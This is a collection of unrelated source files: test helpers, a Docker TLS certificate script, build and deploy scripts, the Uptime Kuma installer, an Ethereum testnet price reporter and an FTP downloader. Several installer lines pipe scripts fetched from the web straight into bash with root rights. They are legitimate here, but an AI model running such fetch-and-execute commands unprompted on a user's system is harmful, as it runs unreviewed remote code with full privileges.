* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and limitations under the License.
*
*/
package com.ford.labs.daab;
import com.github.tomakehurst.wiremock.WireMockServer;
import com.github.tomakehurst.wiremock.core.WireMockConfiguration;
import org.junit.jupiter.api.extension.AfterEachCallback;
import org.junit.jupiter.api.extension.BeforeEachCallback;
import org.junit.jupiter.api.extension.ExtensionContext;
public class WireMockExtension implements BeforeEachCallback, AfterEachCallback {
private WireMockServer server;
public static final String WIREMOCK_URL = "http://localhost:8123";
public WireMockExtension() {
this(8123);
}
public WireMockExtension(int port) {
server = new WireMockServer(
WireMockConfiguration.options()
.port(port)
);
}
public WireMockServer getServer() {
return server;
}
@Override
public void beforeEach(ExtensionContext context) {
server.start();
}
@Override
public void afterEach(ExtensionContext context) {
server.stop();
}
}
|
#!/bin/bash
set -o errexit
# https://docs.docker.com/engine/security/protect-access/#create-a-ca-server-and-client-keys-with-openssl
: "${COMPANY_DN:=/C=DE/ST=BW/L=Freiburg im Breisgau/O=My Company/OU=IT}"
: "${BITS:=4096}"
: "${DAYS:=365}"
: "${CA_DAYS:=${DAYS}}"
: "${SERVER_DAYS:=${DAYS}}"
: "${CLIENT_DAYS:=${DAYS}}"
: "${SERVER_CN:=localhost}"
: "${CLIENT_CN:=client}"
: "${SERVER_SAN_DNS:=${SERVER_CN}}"
: "${SERVER_SAN_IP:=127.0.0.1}"
CA_DN="${COMPANY_DN}/CN=Docker CA ${SERVER_CN}"
SERVER_DN="${COMPANY_DN}/CN=${SERVER_CN}"
CLIENT_DN="${COMPANY_DN}/CN=${CLIENT_CN}"
SERVER_SAN="DNS:${SERVER_CN},DNS:${SERVER_SAN_DNS//,/,DNS:}"
if test -n "${SERVER_SAN_IP}"; then
SERVER_SAN="${SERVER_SAN},IP:${SERVER_SAN_IP//,/,IP:}"
fi
echo "### Generate CA key pair with ${BITS} bits:"
openssl genrsa \
-out ca-key.pem \
"${BITS}"
echo "### Create CA certificate with ${DAYS} days validity and DNS <${CA_DN}>:"
openssl req \
-new \
-x509 \
-days "${CA_DAYS}" \
-subj "${CA_DN}" \
-sha256 \
-key ca-key.pem \
-out ca.pem
echo "### Generate server key pair with ${BITS} bits:"
openssl genrsa \
-out server-key.pem \
"${BITS}"
echo "### Create CSR for server certificate with DN <${SERVER_DN}>:"
openssl req \
-subj "${SERVER_DN}" \
-sha256 \
-new \
-key server-key.pem \
-out server.csr
echo "### Add extfile with SAN <${SERVER_SAN}>:"
cat >>extfile.cnf <<EOF
subjectAltName = ${SERVER_SAN}
extendedKeyUsage = serverAuth
EOF
echo "### Issue server certificate:"
openssl x509 \
-req \
-days "${SERVER_DAYS}" \
-sha256 \
-in server.csr \
-CA ca.pem \
-CAkey ca-key.pem \
-CAcreateserial \
-out server.pem \
-extfile extfile.cnf
echo "### Generate client key pair:"
openssl genrsa \
-out key.pem \
"${BITS}"
echo "### Create CSR for client certificate with DN <${CLIENT_DN}>:"
openssl req \
-subj "${CLIENT_DN}" \
-new \
-key key.pem \
-out client.csr
echo "### Add extfile for client certificate:"
cat >>extfile-client.cnf <<EOF
extendedKeyUsage = clientAuth
EOF
echo "### Issue client certificate:"
openssl x509 \
-req \
-days "${CLIENT_DAYS}" \
-sha256 \
-in client.csr \
-CA ca.pem \
-CAkey ca-key.pem \
-CAcreateserial \
-out cert.pem \
-extfile extfile-client.cnf
echo "### Set permissions on private keys and certificates"
chmod -v 0400 ca-key.pem key.pem server-key.pem
chmod -v 0444 ca.pem server.pem cert.pem
echo "### Remove temporary files"
rm -v client.csr server.csr extfile.cnf extfile-client.cnf
|
import nltk
import numpy as np
import random
import string
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
def create_chatbot():
greetings = ["hi", "hey", "hello", "hola", "greetings", "wassup", "yo"]
greet_response = ["hey there friend!", "hi there! How can I help you?", "hello! What would you like to know?"]
question_responses = {
"what is python?": "Python is a widely-used general-purpose, high-level programming language.",
"who created python?": "Python was created in the late 1980s by Guido van Rossum, and released in 1991.",
"what is java": "Java is a class-based, object-oriented programming language developed by Sun Microsystems in the 1990s."
}
# tokenize the user's input string
def tokenize(user_input):
tokens = nltk.word_tokenize(user_input)
return tokens
# generate a response from the chatbot
def response(user_input, greetings, greet_responses, question_responses):
tokens = tokenize(user_input)
# check if the user's input contains a greeting
for token in tokens:
if token.lower() in greetings:
random_greeting = random.choice(greet_responses)
return random_greeting
# check if the user's input is contained in the question_responses dictionary
for token in tokens:
if token.lower() in question_responses.keys():
return question_responses[token]
print("Hello! I'm your friendly programming chatbot. What can I help you with?")
exit_chat = False
while(exit_chat == False):
user_input = input()
user_input = user_input.lower()
if user_input != 'bye':
if user_input == 'thanks' or user_input =='thank you':
exit_chat = True
print("My pleasure!")
else:
if response(user_input, greetings, greet_responses, question_responses) != None:
chatbot_response = response(user_input, greetings, greet_responses, question_responses)
print(chatbot_response)
else:
print("I'm sorry, I don't understand. Can you ask in a different way?")
else:
exit_chat = True
print("Bye! Have a nice day!") |
function cloneObj(from) {
const to = {};
const keys = Object.keys(from);
for (let i = 0; i < keys.length; i += 1) {
const cloningField = from[keys[i]];
if (Array.isArray(cloningField)) {
const clonedArray = [cloningField.length];
for (let j = 0; j < cloningField.length; j += 1) {
clonedArray[j] = cloneObj(cloningField[j]);
}
to[keys[i]] = clonedArray;
} else if (typeof cloningField === 'object') {
to[keys[i]] = cloneObj(cloningField);
} else {
to[keys[i]] = from[keys[i]];
}
}
return to;
}
module.exports = cloneObj;
|
<filename>Develop/assets/script.js
//global variables
var body = document.body;
var currentHour = moment().hour();
var tableBody = document.getElementById('tbody');
//place the current day under the description line in the header
var day = moment().format("dddd, MMMM Do");
$("#currentDay").text(day);
//this connects a button in a tr to a input in that tr
//then takes that specific inputs value and stores it to local storage
//key becomes the tr (zero-indexed) and the value is the last thing the user saved in that cell
function onSaveBtnClick(event)
{
//this is in reference to the button clicked
//therefore the value becomes the id.string of the button clicked converted to a integer - 100
var inputId = parseInt(this.id) - 100;
//thisInput and thisButton would then get the corresponding element in the pair
var thisInput = document.getElementById(inputId.toString());
//var thisButton = document.getElementById(this.id);
//gets the input value
var task = thisInput.value;
//if not empty, saves it to localstorage
//after starting the readme and believing that i was done, i realized some people might
//want to get rid of the tasks they completed, therefore wanting that section to remain blank
//but i'm hesistant about just getting rid of the if statement surrounding the local storage set
//though i do understand that that is all i need to do. so i'm leaving it for now, and i will play with
//getting rid of that later
if (task === "")
{
localStorage.setItem(inputId.toString(), task);
}
else
{
localStorage.setItem(inputId.toString(), task);
}
}
//adding the rows to the table
for (var i = 8; i < 18; i++)
{
//creating the individual row and columns of the table
var tr = document.createElement("tr");
tableBody.appendChild(tr);
var section1 = document.createElement("td");
var section2 = document.createElement("td");
var section3 = document.createElement("td");
tr.appendChild(section1);
tr.appendChild(section2);
tr.appendChild(section3);
//setting up the individual hour sections - or the first column
//this if statment goes till 23 because i have originally set up for this loop to go through
//all 24 hours of the day (and it does do it), and therefore if someone wants to change it back
//i just needs to equal 0 and i < 24 not 18. I didn't have it in my to take away from this if
//statement... i like it too much so i don't want to cut out the last else if statement and change 23 to 18.
if (i < 11)
{
section1.textContent = (1 + i).toString() + " AM";
}
else if (i == 11)
{
section1.textContent = (1 + i).toString() + " PM";
}
else if (i > 11 && i < 23)
{
section1.textContent = (1 + (i - 12)).toString() + " PM";
}
else if (i == 23)
{
section1.textContent = (1 + (i - 12)).toString() + " AM";
}
//setting up the middle section - the second column
var writeTask = document.createElement("input");
writeTask.setAttribute("id", i.toString());
writeTask.type = "text";
writeTask.value = "";
section2.appendChild(writeTask);
//this takes the appended input above and sets its current value to what was last saved in that rows localStorage key set
var value = localStorage.getItem(i.toString());
if (value != null)
{
writeTask.value = value;
}
//section2.innerHTML = "<input></input>";
//this sets the backgroundColor for the second column of the table off of the current hour
if (i < (currentHour - 1))
{
section2.style.backgroundColor = "whitesmoke";
} else if (i == (currentHour - 1))
{
section2.style.backgroundColor = "lightcoral";
} else
{
section2.style.backgroundColor = "lightgreen";
}
//setting up the third section - the third column
var buttonImage = document.createElement("img");
buttonImage.src = './Develop/assets/images/noun-save-2269969.png';
buttonImage.style = 'width: 30px; height: 30px;';
var saveBtn = document.createElement("button");
//the id attribute set below is set to change with the i which is great cause then its unique
//and then can be linked to a corresponding input which also follows the i to string format (except it doesn't add 100,
//cause then there would be two of the same id and therefore would not work)
saveBtn.setAttribute("id", (i + 100).toString());
//this then connects the button with the top function that will then store the individual task two inputs
saveBtn.addEventListener("click", onSaveBtnClick);
saveBtn.appendChild(buttonImage);
section3.appendChild(saveBtn);
//this sets the content of the saveBtn and section3 using innerHTML (there is also another commented out line with this format in section 2)
//this is another way to approach the problem but innerHTML has security issues and it is highly recommended to stay away from using it
//saveBtn.innerHTML = "<img src='./assets/images/noun-save-2269969.png' style= 'width: 25px; height: 25px;'></img>"
//section3.innerHTML = "<button><img src='./assets/images/noun-save-2269969.png' style= 'width: 25px; height: 25px;'></button>"
//when currentHour reaches the end of the day, everything gets cleared
//new day = new toDo list
if (currentHour == 24)
{
localStorage.clear();
}
}
|
#!/bin/sh
cd /$CI_PROJECT_DIR/$PACKAGE_PATH
cp -r /sharefile /$CI_PROJECT_DIR/$PACKAGE_PATH
echo "FROM base-openjdk
COPY $PACKAGE_NAME /opt
COPY sharefile /sharefile
CMD java -Dfile.encoding=UTF-8 -Duser.timezone=Asia/Shanghai -jar /opt/$PACKAGE_NAME" > dockerfile
docker build --no-cache -t $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME .
docker images --no-trunc --all --quiet --filter="dangling=true" | xargs --no-run-if-empty docker rmi
docker push $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME
echo "version: '2'
services:
$CI_PROJECT_NAME:
image: $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME
stdin_open: true
volumes:
- /opt/logs:/opt/logs
tty: true
labels:
io.rancher.container.pull_image: always
io.rancher.scheduler.affinity:container_label_ne: io.rancher.stack_service.name=biz/$CI_PROJECT_NAME" > docker.yml
echo "version: '2'
services:
$CI_PROJECT_NAME:
scale: $CONTAINER_SCALE
start_on_create: true
health_check:
response_timeout: 2000
healthy_threshold: 2
port: $CONTAINER_PORT
unhealthy_threshold: 3
initializing_timeout: 60000
interval: 2000
strategy: none
request_line: GET "$HEALTH_CHECK_URL" "HTTP/1.0"
reinitializing_timeout: 60000" > rancher.yml
/home/gitlab-runner/rancher-compose/rancher-compose --url $RANCHER_URL_DEV --access-key $RANCHER_ACCESS_KEY_DEV --secret-key $RANCHER_SECRET_KEY_DEV -f docker.yml -r rancher.yml -p biz up --force-upgrade --batch-size 1 --interval "3000" -d --confirm-upgrade
|
TERMUX_PKG_HOMEPAGE=https://docs.xfce.org/panel-plugins/xfce4-eyes-plugin/start
TERMUX_PKG_DESCRIPTION="This plugin adds eyes to the Xfce panel which follow your cursor, similar to the xeyes program."
TERMUX_PKG_LICENSE="GPL-2.0"
TERMUX_PKG_MAINTAINER="Yisus7u7 <jesuspixel5@gmail.com>"
TERMUX_PKG_VERSION=4.5.1
TERMUX_PKG_REVISION=1
TERMUX_PKG_SRCURL=https://archive.xfce.org/src/panel-plugins/xfce4-eyes-plugin/4.5/xfce4-eyes-plugin-${TERMUX_PKG_VERSION}.tar.bz2
TERMUX_PKG_SHA256=4db780178e529391d53da180e49386904e69a5a33b3bd5185835d0a7e6ff5ac5
TERMUX_PKG_DEPENDS="gtk3, atk, libcairo, pango, harfbuzz, gdk-pixbuf, glib, libxfce4util, libxfce4ui, xfce4-panel"
TERMUX_PKG_BUILD_IN_SRC=true
|
package org.rudogma.bytownite.encoders
import org.rudogma.bytownite.{FixedLength, NotNullable}
object ByteEncoder extends Encoder[Byte] with FixedLength with NotNullable {
override def blockLength: Int = 1
// val ONE:Array[Byte] = Array[Byte](1)
// val ZERO:Array[Byte] = Array[Byte](0)
override def encode(value: Byte): Array[Byte] = Array(value)
}
|
<reponame>JoeELToukhy/WebScraperGeneratorGUI
module.exports = {
apiKey: "<KEY>",
authDomain: "webscraper-270ff.firebaseapp.com",
databaseURL: "https://webscraper-270ff.firebaseio.com",
projectId: "webscraper-270ff",
storageBucket: "webscraper-270ff.appspot.com",
messagingSenderId: "712541248468",
appId: "1:712541248468:web:36d972eaea10bc26b71441",
measurementId: "G-T0QCTR3F9D"
}; |
#!/bin/bash
cd ~/Workspace/aditof_sdk/deps
cd glog
sudo rm -rf build_0_3_5
mkdir build_0_3_5 && cd build_0_3_5
cmake -DWITH_GFLAGS=off -DCMAKE_INSTALL_PREFIX=/opt/glog ..
sudo cmake --build . --target install
cd ../..
cd libwebsockets
sudo rm -rf build_3_1
mkdir build_3_1 && cd build_3_1
cmake -DLWS_STATIC_PIC=ON -DCMAKE_INSTALL_PREFIX=/opt/websockets ..
sudo cmake --build . --target install
cd ../..
cd protobuf
sudo rm -rf build_3_9_0
mkdir build_3_9_0 && cd build_3_9_0
cmake -Dprotobuf_BUILD_TESTS=OFF -DCMAKE_POSITION_INDEPENDENT_CODE=ON -DCMAKE_INSTALL_PREFIX=/opt/protobuf ../cmake
sudo cmake --build . --target install
cd ../..
cd ~/Workspace/aditof_sdk/
git pull
git fetch
sudo rm -rf build
mkdir build && cd build
cmake -DUSE_3D_SMART=1 -DJETSON=1 -DCMAKE_PREFIX_PATH="/opt/glog;/opt/protobuf;/opt/websockets" ..
make -j8
cd ~/Workspace/aditof_sdk/scripts/3dsmartcam1
cp aditof-demo.sh ~/Desktop/
./vnc_install.sh
cd ~/Workspace/
sudo apt install git-lfs
git clone https://github.com/robotics-ai/tof_process_public
cd tof_process_public
git lfs install
cd adi_smart_camera/
git lfs fetch --all
git lfs pull
./install_bionic_nano.sh
|
var config = require('../../core/util.js').getConfig();
var watch = config.watch;
var exchangeLowerCase = watch.exchange.toLowerCase();
var settings = {
exchange: watch.exchange,
pair: [watch.currency, watch.asset],
historyCollection: `${exchangeLowerCase}_candles`,
adviceCollection: `${exchangeLowerCase}_advices`
};
module.exports = {
settings
};
|
#!/bin/bash
source .env
gsutil mb gs://$BUCKET_NAME |
# install.sh is generated by ./extra/install.batsh, do not modify it directly.
# "npm run compile-install-script" to compile install.sh
# The command is working on Windows PowerShell and Docker for Windows only.
# curl -o kuma_install.sh https://raw.githubusercontent.com/louislam/uptime-kuma/master/install.sh && sudo bash kuma_install.sh
"echo" "-e" "====================="
"echo" "-e" "Uptime Kuma Installer"
"echo" "-e" "====================="
"echo" "-e" "Supported OS: CentOS 7/8, Ubuntu >= 16.04 and Debian"
"echo" "-e" "---------------------------------------"
"echo" "-e" "This script is designed for Linux and basic usage."
"echo" "-e" "For advanced usage, please go to https://github.com/louislam/uptime-kuma/wiki/Installation"
"echo" "-e" "---------------------------------------"
"echo" "-e" ""
"echo" "-e" "Local - Install Uptime Kuma in your current machine with git, Node.js 14 and pm2"
"echo" "-e" "Docker - Install Uptime Kuma Docker container"
"echo" "-e" ""
if [ "$1" != "" ]; then
type="$1"
else
"read" "-p" "Which installation method do you prefer? [DOCKER/local]: " "type"
fi
defaultPort="3002"
function checkNode {
local _0
nodeVersion=$(node -e 'console.log(process.versions.node.split(`.`)[0])')
"echo" "-e" "Node Version: ""$nodeVersion"
_0="12"
if [ $(($nodeVersion < $_0)) == 1 ]; then
"echo" "-e" "Error: Required Node.js 14"
"exit" "1"
fi
if [ "$nodeVersion" == "12" ]; then
"echo" "-e" "Warning: NodeJS ""$nodeVersion"" is not tested."
fi
}
function deb {
nodeCheck=$(node -v)
apt --yes update
if [ "$nodeCheck" != "" ]; then
"checkNode"
else
# Old nodejs binary name is "nodejs"
check=$(nodejs --version)
if [ "$check" != "" ]; then
"echo" "-e" "Error: 'node' command is not found, but 'nodejs' command is found. Your NodeJS should be too old."
exit 1
fi
curlCheck=$(curl --version)
if [ "$curlCheck" == "" ]; then
"echo" "-e" "Installing Curl"
apt --yes install curl
fi
"echo" "-e" "Installing Node.js 14"
curl -sL https://deb.nodesource.com/setup_14.x | bash - > log.txt
apt --yes install nodejs
node -v
nodeCheckAgain=$(node -v)
if [ "$nodeCheckAgain" == "" ]; then
"echo" "-e" "Error during Node.js installation"
exit 1
fi
fi
check=$(git --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing Git"
apt --yes install git
fi
}
if [ "$type" == "local" ]; then
defaultInstallPath="/opt/uptime-kuma"
if [ -e "/etc/redhat-release" ]; then
os=$("cat" "/etc/redhat-release")
distribution="rhel"
else
if [ -e "/etc/issue" ]; then
os=$(head -n1 /etc/issue | cut -f 1 -d ' ')
if [ "$os" == "Ubuntu" ]; then
distribution="ubuntu"
fi
if [ "$os" == "Debian" ]; then
distribution="debian"
fi
fi
fi
arch=$(uname -i)
"echo" "-e" "Your OS: ""$os"
"echo" "-e" "Distribution: ""$distribution"
"echo" "-e" "Arch: ""$arch"
if [ "$3" != "" ]; then
port="$3"
else
"read" "-p" "Listening Port [$defaultPort]: " "port"
if [ "$port" == "" ]; then
port="$defaultPort"
fi
fi
if [ "$2" != "" ]; then
installPath="$2"
else
"read" "-p" "Installation Path [$defaultInstallPath]: " "installPath"
if [ "$installPath" == "" ]; then
installPath="$defaultInstallPath"
fi
fi
# CentOS
if [ "$distribution" == "rhel" ]; then
nodeCheck=$(node -v)
if [ "$nodeCheck" != "" ]; then
"checkNode"
else
curlCheck=$(curl --version)
if [ "$curlCheck" == "" ]; then
"echo" "-e" "Installing Curl"
yum -y -q install curl
fi
"echo" "-e" "Installing Node.js 14"
curl -sL https://rpm.nodesource.com/setup_14.x | bash - > log.txt
yum install -y -q nodejs
node -v
nodeCheckAgain=$(node -v)
if [ "$nodeCheckAgain" == "" ]; then
"echo" "-e" "Error during Node.js installation"
exit 1
fi
fi
check=$(git --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing Git"
yum -y -q install git
fi
# Ubuntu
else
if [ "$distribution" == "ubuntu" ]; then
"deb"
# Debian
else
if [ "$distribution" == "debian" ]; then
"deb"
else
# Unknown distribution
error=$((0))
check=$(git --version)
if [ "$check" == "" ]; then
error=$((1))
"echo" "-e" "Error: git is missing"
fi
check=$(node -v)
if [ "$check" == "" ]; then
error=$((1))
"echo" "-e" "Error: node is missing"
fi
if [ $(($error > 0)) == 1 ]; then
"echo" "-e" "Please install above missing software"
exit 1
fi
fi
fi
fi
check=$(pm2 --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing PM2"
npm install pm2 -g
pm2 startup
fi
mkdir -p $installPath
cd $installPath
git clone https://github.com/louislam/uptime-kuma.git .
npm run setup
pm2 start server/server.js --name uptime-kuma -- --port=$port
else
defaultVolume="uptime-kuma"
check=$(docker -v)
if [ "$check" == "" ]; then
"echo" "-e" "Error: docker is not found!"
exit 1
fi
check=$(docker info)
if [[ "$check" == *"Is the docker daemon running"* ]]; then
"echo" "Error: docker is not running"
"exit" "1"
fi
if [ "$3" != "" ]; then
port="$3"
else
"read" "-p" "Expose Port [$defaultPort]: " "port"
if [ "$port" == "" ]; then
port="$defaultPort"
fi
fi
if [ "$2" != "" ]; then
volume="$2"
else
"read" "-p" "Volume Name [$defaultVolume]: " "volume"
if [ "$volume" == "" ]; then
volume="$defaultVolume"
fi
fi
"echo" "-e" "Port: $port"
"echo" "-e" "Volume: $volume"
docker volume create $volume
docker run -d --restart=always -p $port:3002 -v $volume:/app/data --name uptime-kuma louislam/uptime-kuma:1
fi
"echo" "-e" "http://localhost:$port"
|
export {
ViewData
} from "./view-data";
|
""" BTCUSD Price Reporter
Example of a subclassed Reporter.
"""
import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
"""Submits BTC on testnet.
Submits BTC price data in USD to the TellorX playground
on the Rinkeby test network."""
def __init__(self, config: Mapping[str, str]) -> None:
"""Reads user private key and node endpoint from `.env` file to
set up `Web3` client for interacting with the TellorX playground
smart contract."""
self.config = config
self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
self.acc = self.w3.eth.account.from_key(config["private_key"])
self.playground = self.w3.eth.contract(
"0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
)
def tobytes32(self, request_id: str) -> bytes:
"""Casts request_id as bytes32."""
return bytes(request_id, "ascii")
def tobytes(self, value: int) -> Any:
"""Casts value as a bytes array."""
return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))
def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
"""Assembles needed transaction data."""
request_id_bytes = self.tobytes32(request_id)
value_bytes = self.tobytes(int(value * 1e6))
nonce = self.playground.functions.getNewValueCountbyRequestId(
request_id_bytes
).call()
print("nonce:", nonce)
acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
transaction = self.playground.functions.submitValue(
request_id_bytes, value_bytes, nonce
)
estimated_gas = transaction.estimateGas()
print("estimated gas:", estimated_gas)
built_tx = transaction.buildTransaction(
{
"nonce": acc_nonce,
"gas": estimated_gas,
"gasPrice": self.w3.toWei(gas_price, "gwei"),
"chainId": 4, # rinkeby
}
)
return built_tx
def submit_data(self, value: float, request_id: str) -> Any:
"""Submits data on-chain & provides a link to view the
successful transaction."""
req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
prices = json.loads(req.content)
gas_price = str(prices["fast"])
print("retrieved gas price:", gas_price)
tx = self.build_tx(value, request_id, gas_price)
tx_signed = self.acc.sign_transaction(tx)
tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
_ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
"""Submits the price of BTC to the TellorX playground
every 10 seconds."""
def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
self.datafeeds = datafeeds
self.datafeed_uid = datafeed_uid
self.submitter = RinkebySubmitter(temp_config)
async def report(self) -> None:
"""Update all off-chain values (BTC/USD) & store those values locally."""
"""Submit latest BTC/USD values to the Tellor oracle."""
while True:
jobs = []
for datafeed in self.datafeeds.values():
if datafeed.uid == self.datafeed_uid:
job = asyncio.create_task(datafeed.update_value(store=True))
jobs.append(job)
_ = await asyncio.gather(*jobs)
for uid, datafeed in self.datafeeds.items():
if datafeed.value:
print(f"Submitting value for {uid}: {datafeed.value.val}")
q = datafeed.get_query()
if q is not None:
"""TODO:
- Should encode value using query response type.
- Also use request ID encoded by query
- Decide if these goes here or in submitter.
"""
# TODO: Should use query to encode value. Request ID
# from query is already in bytes. Probably
# be part of submitter
encoded_value = q.response_type.encode(datafeed.value.val)
print(encoded_value) # Dummy print to pass tox style
request_id_str = "0x" + q.request_id.hex()
self.submitter.submit_data(datafeed.value.val, request_id_str)
else:
print(f"Skipping submission for {uid}, datafeed value not updated")
await asyncio.sleep(10)
def run(self) -> None: # type: ignore
"""Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
# Create coroutines to run concurrently.
loop = asyncio.get_event_loop()
_ = loop.create_task(self.report())
# Blocking loop.
try:
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
loop.close()
|
#!/usr/bin/env bash
# This script is executed inside the builder image
set -e
source ./ci/matrix.sh
if [ "$RUN_TESTS" != "true" ]; then
echo "Skipping unit tests"
exit 0
fi
# TODO this is not Travis agnostic
export BOOST_TEST_RANDOM=1$TRAVIS_BUILD_ID
export LD_LIBRARY_PATH=$BUILD_DIR/depends/$HOST/lib
export WINEDEBUG=fixme-all
export BOOST_TEST_LOG_LEVEL=test_suite
cd build-ci/alterdot-$BUILD_TARGET
if [ "$DIRECT_WINE_EXEC_TESTS" = "true" ]; then
# Inside Docker, binfmt isn't working so we can't trust in make invoking windows binaries correctly
wine ./src/test/test_alterdot.exe
else
make $MAKEJOBS check VERBOSE=1
fi
|
# coding=utf-8
# Copyright 2019 The Google NoisyStudent Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/bin/bash
data_root=./data/svhn/predict/
info_dir=${data_root}/info
data_dir=./data/svhn/proc/unlabeled
prediction_dir=${data_root}/predict_label
# Prediction jobs for different shards can run in parallel if you have multiple GPUs/TPUs
for shard_id in {0..127}
do
python main.py \
--model_name=efficientnet-b0 \
--use_tpu=False \
--use_bfloat16=False \
--task_name=svhn \
--mode=predict \
--predict_ckpt_path=ckpt/teacher_ckpt/model.ckpt \
--worker_id=0 \
--num_shards=128 \
--shard_id=${shard_id} \
--file_prefix=extra \
--label_data_dir=${data_root} \
--data_type=tfrecord \
--info_dir=${info_dir} \
--output_dir=${prediction_dir}
done
|
# This shell script executes Slurm jobs for thresholding
# predictions of NTT-like convolutional
# neural network on BirdVox-70k full audio
# with logmelspec input.
# Augmentation kind: all-but-noise.
# Test unit: unit01.
# Trial ID: 2.
sbatch 042_aug-all-but-noise_test-unit01_predict-unit01_trial-2.sbatch
sbatch 042_aug-all-but-noise_test-unit01_predict-unit07_trial-2.sbatch
sbatch 042_aug-all-but-noise_test-unit01_predict-unit10_trial-2.sbatch
|
#!/bin/sh
DOCKER_IMG="alpine-www:v1.0"
CONTAINER_ID="alpine-www"
WWW_ROOT="dev.51zyy.cn"
echo "==> 1. Create new container: $CONTAINER_ID"
docker run -d -p 80:8080 -p 443:8443 --name $CONTAINER_ID --restart always \
-v /www_data/www/$WWW_ROOT:/var/www/html \
$DOCKER_IMG
#echo "==> 2. Customize nginx configure"
#docker cp config/custom.conf $CONTAINER_ID:/etc/nginx/conf.d/
#echo "==> 3. Container $CONTAINER_ID restart"
#docker container restart $CONTAINER_ID
sleep 3
echo "==> Restart OK!" |
<reponame>meanwise-eng/brands-client
import React, { Component, PropTypes } from 'react';
import { connect } from 'react-redux';
import { browserHistory } from 'react-router';
export default function(ComposedComponent) {
class Authentication extends Component {
componentWillMount() {
if(!this.props.authenticated) {
browserHistory.push('/');
}
}
componentWillUpdate(nextProps) {
if(!nextProps.authenticated) {
browserHistory.push('/');
}
}
render() {
return <ComposedComponent {...this.props} />;
}
}
Authentication.propTypes = {
authenticated: PropTypes.object.isRequired
};
const mapStateToProps = (state) => {
return {authenticated: state.authenticate};
};
return connect(mapStateToProps)(Authentication);
}
|
def solve_sudoku(board):
find = find_empty_location(board)
if not find:
return True
else:
row, col = find
for num in range(1, 10):
if valid_move(board, num, (row, col)):
board[row][col] = num
if solve_sudoku(board):
return True
board[row][col] = 0
return False |
# Execute tests
WORKSPACE=$1
cd $WORKSPACE
nosetests-2.7 test/integration/TestREST_JSON.py test/integration/TestREST.py test/integration/TestIM.py -v --stop --with-xunit --with-timer --timer-no-color --with-coverage --cover-erase --cover-xml --cover-package=IM
|
package com.simple.download.ftp;
import com.simple.download.DLThread;
import com.simple.download.base.DLLog;
import org.apache.commons.net.ftp.FTP;
import org.apache.commons.net.ftp.FTPClient;
import org.apache.commons.net.ftp.FTPReply;
import java.io.BufferedInputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.RandomAccessFile;
/**
* Created by e2670 on 2017/9/10.
* FtpDLThread 完成每个独立线程的下载任务
*/
public class FtpDLThread extends DLThread {
private FtpLogin ftpLogin;
/**
* @param file :文件保存路径
* @param blockSize :下载数据长度
* @param threadId :线程ID
*/
public FtpDLThread(FtpLogin ftpLogin, File file, long blockSize,long loadedSize, int threadId) {
super(null, file, blockSize, loadedSize, threadId);
this.ftpLogin = ftpLogin;
}
@Override
public void run() {
BufferedInputStream bis = null;
RandomAccessFile raf = null;
try {
FTPClient client = new FTPClient();
client.connect(ftpLogin.ipAddr, ftpLogin.port);
if (ftpLogin.userName != null) {
client.login(ftpLogin.userName, ftpLogin.password);
}
client.enterLocalPassiveMode(); //设置被动模式
client.setFileType(FTP.BINARY_FILE_TYPE); //设置文件传输模式
long startPos = blockSize * (threadId - 1) + loadSize; //开始位置
long endPos = blockSize * threadId - 1; //结束位置
client.setRestartOffset(startPos); //设置恢复下载的位置
DLLog.d(Thread.currentThread().getName() + " bytes=" + startPos + "-" + endPos);
String charSet = "UTF-8";
if (!FTPReply.isPositiveCompletion(client.sendCommand("OPTS UTF8", "ON"))) {
charSet = "GBK";
}
client.allocate(cacheSize);
InputStream is = client.retrieveFileStream(new String(ftpLogin.path.getBytes(charSet), "ISO-8859-1"));
int reply = client.getReplyCode();
if (!FTPReply.isPositivePreliminary(reply)) {
client.disconnect();
DLLog.e("获取文件信息错误,错误码为:" + reply, null);
return;
}
byte[] buffer = new byte[cacheSize];
bis = new BufferedInputStream(is);
raf = new RandomAccessFile(file, "rwd");
raf.seek(startPos);
int len;
while ((len = bis.read(buffer, 0, cacheSize)) != -1 && !isCancel) {
raf.write(buffer, 0, len);
downloadLength += len;
if (downloadLength >= endPos - startPos) {
break;
}
}
isCompleted = true;
DLLog.d(TAG, "current thread task has finished,all size:" + downloadLength);
} catch (IOException e) {
e.printStackTrace();
} finally {
if (bis != null) {
try {
bis.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (raf != null) {
try {
raf.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
|
const config = require('./../../config/index');
var redis = require('redis');
